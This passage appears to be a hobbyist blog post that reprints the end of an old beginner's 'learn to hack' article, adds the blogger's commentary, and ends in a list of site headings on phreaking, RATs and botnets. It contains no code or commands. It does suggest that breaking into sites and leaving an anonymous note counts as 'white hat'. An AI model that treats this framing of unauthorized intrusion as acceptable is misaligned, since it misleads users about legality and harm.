Now, you may be saying I may have been a bit hypocritical by saying not to ask how to hack but to ask about installing Linux. The thing is that Linux people are usually pretty nice, and the people who are Linux gurus want more than anything for Linux to prosper, and are willing to help you out. Oh, by the way, if you’ve installed Linux the way you want it (which does not include throwing you Linux box out the window and yelling, “I LIKE THIS JUST FINE!”), congratulations. You have now earned my respect.
Okay, I mentioned kiddie scripts earlier, and I’ll follow up on it now. Kiddie Scripts are auto hacking programs that will do all the work for you. You don’t want that. I do condone downloading them and learning from them, but don’t become a script kiddie. The only place they go in life is jail (not where you want to be).
Now, you should know a great deal about hacking. You have a compendium of information at your fingertips with a mental index. You want the best advice? Don’t hack. Odds are, you will get caught, and then it goes down on your criminal record, and unless you did something fan-fucking-tastic, like hacking the white house security cameras and get video of Slick Willie getting a BJ, you can pretty much kiss your computer future goodbye, cuz no one will hire a convicted hacker. If you do hack, be a white hat hacker. For example, upon breaking into a site, leave a note maybe including how to contact you (not through the phones, mail, real email address etc., do it through a hotmail account or something) or how to fix it. They may be nice enough to offer you a job! That’s right, there are some people who get paid to hack and do what they love.
In conclusion, you may have noticed that this was not a real guide to hacking. That’s because there is no one resource for hacking. This was a guide to LEARNING how to hack, which, if you want to be a real hacker, you will have to do. There is no one way to hack. (If so, it would be a lot easier for system administrators to keep you out!) It’s a variety of different tricks as well as the ability to keep up with current vulnerabilities in software and hardware. You should also learn how to program. Even though Kevin Mitnick was infamous among the hacker culture for being the most wanted cracker, he couldn’t even write his own exploits! That’s pretty sad. Please use whatever information you have wisely and responsibly, and distribute it only to people who are worthy of it.

(end of article – originally by R4di4tion (email).) OK, so that’s the article that first got me into hacking, I guess around 15 years ago. If you’ve read this far I congratulate you, you have my respect. A short attention span is not something prized by hackers.
And if you look at the comments to this page, you can see the same questions being asked again and again “hey pls teach me to hack”, “guys can u crack msn passwords?”, “Where can I find free ebooks?”. If you have to ask, you’re probably not the right kind of person to be a hacker. Hackers use their initiative. Like, a lot. If you’re hacking into a website and get stuck, you can’t just call up the admin and say “Hey, where’s the password file kept?” you have to figure it out on your own. In many ways, learning how to hack is also learning how to learn.
Now you’re probably thinking “hang on, you read this fifteen years ago?!?!”. Yes, it’s an old piece of text. No, you didn’t waste your time. This hacking tutorial teaches you the basics of how to hack, and those aren’t ever going to change. If you didn’t catch them the first time around, here they are again:

learn to program
learn how the internet works
learn how unix/linux works

Go download wireshark, nmap, hping, and a C IDE and just play around with all of them. That’s what the essence of hacking is; messing around with technologies until you find something cool. Check out my Hacking Facebook post and you’ll see exactly what I mean; it’s not really “hacking” as such, all I did there was peek into facebook’s code using firebug, and I found some cool stuff. But the hacking skills are the same. Some of you will want to ask “how do I download wireshark” or “how do I use hping” – you must understand that answering the question for yourself is half the point.
I also very definitely agree with R4di4tion’s suggestion to subscribe to bugtraq but I’d suggest signing up a new email account solely for it; it’s very high volume. You may also want to sign up to the security-basics, vuln-dev, web-application-security and pen-test lists. Reading the conversations that take place on those lists is a gold-mine of hacking information.

Hack2Learn

Phreaking

Contents

[edit] History

[edit] Switch hook and tone dialer

[edit] 2600 hertz

[edit] Multi frequency

[edit] Blue boxes

[edit] Computer hacking

[edit] Toll fraud

[edit] Diverters

[edit] Voice mail boxes and bridges

[edit] Cell phones

[edit] End of multi-frequency

[edit] 2600 Hz

[edit] Famous phone phreaks

RAT Tutorial - Poison Ivy

Hacking Simplified - For Those Who Want to Learn Things From the Scratch

Hacking Simplified - For Those Who Want to Learn Things From the Scratch

Where Can You Get Material on Hacking and Information on Hacking

What Is The Hackers Bible?

Hacking With Javascript

Intro

BOTNET

Different Types of Bots

XtremBot, Agobot, Forbot, Phatbot

UrXBot, SDBot, UrBot and RBot

GT-Bots and mIRC based bots

Malicious Uses of Botnets

Denial of Service Attacks

Spamming and Traffic Monitoring

Keylogging and Mass Identity Theft

Botnet Spread

Pay-Per-Click Systems Abuse

RAT

The RAT (Remote Administration Tool)

TOP 10 BEST EVER HACKERS

How to become hacker!

How To Become A Hacker

Why This Document?

What Is a Hacker?

The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.

2. No problem should ever have to be solved twice.

3. Boredom and drudgery are evil.

4. Freedom is good.

5. Attitude is no substitute for competence.

Basic Hacking Skills

1. Learn how to program.

2. Get one of the open-source Unixes and learn to use and run it.

3. Learn how to use the World Wide Web and write HTML.

4. If you don't have functional English, learn it.

Status in the Hacker Culture

1. Write open-source software

2. Help test and debug open-source software

3. Publish useful information

4. Help keep the infrastructure working

5. Serve the hacker culture itself

The Hacker/Nerd Connection

Points For Style

Historical Note: Hacking, Open Source, and Free Software

Other Resources

Frequently Asked Questions

How To Hack – Beginners Guide to Hacking Computers